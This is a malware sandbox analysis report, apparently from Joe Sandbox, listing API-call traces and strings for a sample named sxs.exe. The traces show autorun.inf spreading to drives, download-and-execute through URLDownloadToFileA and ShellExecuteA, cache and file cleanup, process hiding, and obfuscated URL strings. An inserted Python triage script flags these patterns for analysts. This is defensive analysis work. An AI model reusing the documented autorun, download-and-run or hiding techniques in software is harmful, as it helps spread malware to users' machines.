                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                            • API String ID: 667068680-597814768
                                                                            • Opcode ID: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction ID: 023e8f8eb36bf4682933e0370cb39b54a2ce952b5e9d5c020180350aed9ba6c9
                                                                            • Opcode Fuzzy Hash: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction Fuzzy Hash: 6231C9F06403509FDB11EBB5AA85A2933E8EB96305750657ABA00EF6D4D77CC810CB1E
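Added triage example (not part of the Joe Sandbox report or its IDA plugin output): the script below parses API lines in the format this report uses and flags the patterns visible in this section. The sample lines are copied from the records above and from the URLDownloadToFileA record that follows; the finding names, the 3-minute sleep threshold (mirroring the report's own "Contains long sleeps (>= 3 min)" signature) and the Toolhelp32 name list are this example's choices. What it decodes: VirtualAlloc with flAllocationType 0x1000 (MEM_COMMIT) and flProtect 0x40 (PAGE_EXECUTE_READWRITE), the RWX staging allocation an unpacker or injector needs; Sleep(0x493E0) = 300000 ms, a five-minute delay paired with InternetGetConnectedState; the GetProcAddress chain that resolves the whole Toolhelp32 family from GetModuleHandleA("kernel32.dll") so none of those names appear in the static import table; and URLDownloadToFileA followed by DeleteUrlCacheEntry. Caveat a practitioner should keep in mind: the tracer prints the raw stack, so values beyond an API's real argument count are caller stack residue, and "?" marks a value it could not recover.

```python
import re
from dataclasses import dataclass

# Windows memory constants the report prints as raw hex.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
             0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",
                0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
# Toolhelp32 exports; resolving them at run time keeps them out of the import table.
TOOLHELP = {"CreateToolhelp32Snapshot", "Process32First", "Process32Next",
            "Process32FirstW", "Process32NextW", "Module32First", "Module32Next",
            "Thread32First", "Thread32Next", "Toolhelp32ReadProcessMemory"}
LONG_SLEEP_MS = 3 * 60 * 1000  # assumption: same threshold as the report's signature

# One call per line: "<API>.<MODULE>(<args>), ref: <addr>"; re.search skips the
# "Part of subcall function ...:" prefix that nested calls carry.
CALL_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)")

# Constructed sample: API lines copied from the "APIs" entries of this section.
SAMPLE_LINES = """
• VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,?,?,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439D1B
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,005316A6,00001000), ref: 005311C3
• VirtualFree.KERNELBASE(00008000,00000000,00008000,00531847,00000000), ref: 005311D5
• Sleep.KERNEL32(000493E0), ref: 004084BD
  • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004059A7
• Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725), ref: 004059B5
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405C60
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int


def parse_api_lines(text: str) -> list:
    """Parse every '<API>.<MODULE>(args), ref: addr' line into an ApiCall."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if m:
            name, module, raw, ref = m.groups()
            args = [a.strip() for a in raw.split(",")] if raw.strip() else []
            calls.append(ApiCall(name, module, args, int(ref, 16)))
    return calls


def hexarg(arg: str):
    """Hex argument -> int; None for '?' (not recovered) or string arguments."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_protect(value: int) -> str:
    """Name a PAGE_* protection, including the modifier bits."""
    base = PAGE_PROTECT.get(value & 0xFF, hex(value & 0xFF))
    mods = [n for bit, n in ((0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"),
                             (0x400, "PAGE_WRITECOMBINE")) if value & bit]
    return "|".join([base] + mods)


def triage(calls: list) -> list:
    """Return (kind, ref, detail) findings. Only the first N arguments of an
    N-argument API are meaningful; the rest of the printed stack is residue."""
    findings, resolved, first_gpa = [], [], None
    for c in calls:
        if c.name == "VirtualAlloc" and len(c.args) >= 4:
            alloc, prot = hexarg(c.args[2]), hexarg(c.args[3])
            if prot is not None and prot & 0x40:       # PAGE_EXECUTE_READWRITE
                size = hexarg(c.args[1])
                findings.append(("rwx_alloc", c.ref,
                                 f"{MEM_FLAGS.get(alloc, alloc)} {decode_protect(prot)} "
                                 f"size={size if size is not None else '?'}"))
        elif c.name == "Sleep" and c.args:
            ms = hexarg(c.args[0])
            if ms is not None and ms >= LONG_SLEEP_MS:
                findings.append(("long_sleep", c.ref, f"{ms} ms"))
        elif c.name == "GetProcAddress" and len(c.args) >= 2:
            resolved.append(c.args[1])                # second argument is the export name
            first_gpa = c.ref if first_gpa is None else first_gpa
        elif c.name.startswith("URLDownloadToFile"):
            findings.append(("download", c.ref, c.name))
        elif c.name == "DeleteUrlCacheEntry":
            findings.append(("cache_cleanup", c.ref, c.name))
    hidden = sorted(TOOLHELP.intersection(resolved))
    if hidden:
        findings.append(("dynamic_toolhelp", first_gpa, ",".join(hidden)))
    return findings


if __name__ == "__main__":
    for kind, ref, detail in triage(parse_api_lines(SAMPLE_LINES)):
        print(f"{kind:16} ref={ref:08X} {detail}")
```

Run against the sample it reports two RWX allocations (0x20000 bytes at 00439D1B and an unrecovered size at 005311C3), the 300000 ms sleep, the download and cache cleanup, and the three Toolhelp32 names resolved through GetProcAddress. Extend TOOLHELP or add a branch per API family to cover the other records in the report.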
                                                                            APIs
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405970
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725,?,00000000,?,00407FF7,00000001,00000000), ref: 00405982
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004059A7
• Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725), ref: 004059B5
• GetEnvironmentVariableA.KERNEL32(ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000), ref: 00405A2E
• SHGetSpecialFolderLocation.SHELL32(00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405A3B
• SHGetPathFromIDList.SHELL32(?,?), ref: 00405A4B
  • Part of subcall function 00404D04: GetVersionExA.KERNEL32(?,?,004072CF,00000000,0040775D,?,00000003,00000000,00000000), ref: 00404D15
• Sleep.KERNEL32(000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405C3C
• DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C4E
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405C60
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: Delete$File$CacheEntrySleep$DownloadEnvironmentFolderFromListLocationPathSpecialVariableVersion
• String ID: MfimBljf9$MfimMkbf|86$ProgramFiles$XLhwawhfp%C{tiiqaw(vvi$XLhwawhfp%C{tiiqawZja}vokwc-a}c$_LhwawhfpVnlvqevpX$llc-p}r$lqrs>*)nwb(wimg`o`t-gjk,m`(w|q$qwj>
• API String ID: 1888836333-1695214238
• Opcode ID: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
• Instruction ID: a5c779206b19b53d33bbc18893a0be02a82dcc92b5c72ba9f95bed763f7d3347
• Opcode Fuzzy Hash: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
• Instruction Fuzzy Hash: D09103746012099BD710FB65DD4AA8E77B8EF84308F1040BBB504BB2E3DA78AE418F5D
APIs
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• FindWindowA.USER32(#32770,00000000), ref: 00406CE5
• GetWindowTextA.USER32(00000000,0040AEDC,00000104), ref: 00406D17
• FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406DC3
• FindWindowExA.USER32(00000000,00000000,AfxWnd42,00000000), ref: 00406DE1
• FindWindowExA.USER32(00000000,00000000,RICHEDIT,00000000), ref: 00406DFF
• FindWindowExA.USER32(00000000,00000000,Button,00406F50), ref: 00406E20
• FindWindowExA.USER32(00000000,00000000,RichEdit20A,00000000), ref: 00406E3E
• SendMessageA.USER32(00000000,000000C2,000000B4,00000000), ref: 00406E7E
• Sleep.KERNEL32(000002BC,00000000,000000C2,000000B4,00000000,00000000,00000000,RichEdit20A,00000000,00000000,00000000,Button,00406F50,00000000,00000000,RICHEDIT), ref: 00406E88
• SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00406E9E
• SendMessageA.USER32(00000000,0000000C,00000000,00406F70), ref: 00406EB4
• FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406ECC
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: Window$Find$MessageSend$DirectorySleepTextWindows
• String ID: #32770$AfxWnd42$Button$RICHEDIT$RichEdit20A$bbyb.dll
• API String ID: 4044579835-3821104793
• Opcode ID: 2b7c7420146259d1b63771cbd3506dc523231e8cc6493d49fbb382b1b43dd8cc
• Instruction ID: c2cdf916bea0aacb3b287b9c217ab58656c52756c70eb46c7f93f36c1c6821be
• Opcode Fuzzy Hash: 2b7c7420146259d1b63771cbd3506dc523231e8cc6493d49fbb382b1b43dd8cc
• Instruction Fuzzy Hash: 53813670340206AFE710EF64D986F5A77A9EB85704F51407AF901BB2E2D7B8AD50CB9C
APIs
• GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406468
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 0040648B
• DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064A9
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064C7
• GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A), ref: 004064EB
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040651C
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 004065F8
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406618
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: File$Attributes$Delete$CopyDriveModuleNameType
• String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
• API String ID: 4177304369-1696378998
• Opcode ID: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
• Instruction ID: d6a08cfd8c4e4eb5d113470b4235742803baeb825baf014acef4385ded9ab805
• Opcode Fuzzy Hash: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
• Instruction Fuzzy Hash: 31715370610108ABCB00FBA6C952A8E77B9AF84709F50853BB501B72D2CB7DAF11875D
APIs
• GetDriveTypeA.KERNEL32(00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040601B
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040607C
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040609C
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060C4
• SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060E7
• DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406105
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406123
• GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6), ref: 00406147
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406178
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 00406254
• SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406274
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: File$Attributes$Delete$CopyDriveModuleNameType
• String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
• API String ID: 4177304369-1696378998
• Opcode ID: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
• Instruction ID: 5df22afb16b272ec04df581e562d200e9037b34e0cc2cdfdfd0487ba17cb2571
• Opcode Fuzzy Hash: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
• Instruction Fuzzy Hash: C1711070A10508ABCB00FBA6C956A9F7779AF84709F50417BB501BB2D2CB7CAF05879D
APIs
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
• DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
• Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405750
• Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000), ref: 0040575E
• ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004057E2
• Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057EC
• DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057FE
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405810
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405822
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405854
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: Delete$File$CacheEntrySleep$Download$ExecuteShell
• String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w
• API String ID: 4037061717-2671944630
• Opcode ID: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
• Instruction ID: 785d72677e56ec84aa5b7725342f13d88417e98dc42c661718efd2ccd2bec02f
• Opcode Fuzzy Hash: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
• Instruction Fuzzy Hash: 1C61EE706111059BDB00FBA6D986E8E77B8EF45709F10447AF500BB2E3DA78ED048B9D
APIs
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405E02
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000,?,00406707,00406725,?,00000000), ref: 00405E14
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405E39
• Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000), ref: 00405E47
• ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 00405EEE
• Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C), ref: 00405EF8
• DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405F0A
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405F1C
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: Delete$File$CacheEntrySleep$DirectoryDownloadExecuteShellWindows
• String ID: A}vokwcq*`~f$`tn{5+r{p$kucm$lqrs>*)nwb(wimg`o`t-gjk,p`gm5+r{p
• API String ID: 2803323816-32510556
• Opcode ID: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
• Instruction ID: 62040580da8bc4b8ed49dd40f25ba5acd27351cacc19992f52bcfc8538425eb2
• Opcode Fuzzy Hash: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
• Instruction Fuzzy Hash: 6241BC74711105ABD700FF6AD946A4E77B8EF85709F10407BB940BB2E3CA78AE018A6D
                                                                            APIs
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402613
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040261D
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040263A
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402644
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040266D
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 00402677
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040269B
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 004026A5
                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: CharNext
• String ID: "$"
• API String ID: 3213498283-3758156766
APIs
• LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
• LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
• RegisterClassA.USER32(0042AE18), ref: 00408A7A
  • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
• SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
• TranslateMessage.USER32(0042AE44), ref: 00408AE0
• DispatchMessageA.USER32(0042AE44), ref: 00408AE6
• GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
• KillTimer.USER32(00000000,00000000,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
Similarity
• API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
• String ID: bbyb
• API String ID: 638683977-2792963345
APIs
• GetClassNameA.USER32(?,?,00000100), ref: 00405443
• SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
• SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
Similarity
• API ID: MessageSend$ClassName
• String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
• API String ID: 787153527-2237947760
APIs
• GetClassNameA.USER32(?,?,00000100), ref: 00405443
• SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
• SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
Similarity
• API ID: MessageSend$ClassName
• String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
• API String ID: 787153527-2237947760
APIs
• GetVersionExA.KERNEL32(?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049DA
• LoadLibraryA.KERNEL32(kernel32.dll,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049F5
• GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00404A13
• FreeLibrary.KERNEL32(00000000,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 00404A2D
Similarity
• API ID: Library$AddressFreeLoadProcVersion
• String ID: RegisterServiceProcess$kernel32.dll
• API String ID: 493525861-4020013434
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
• RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
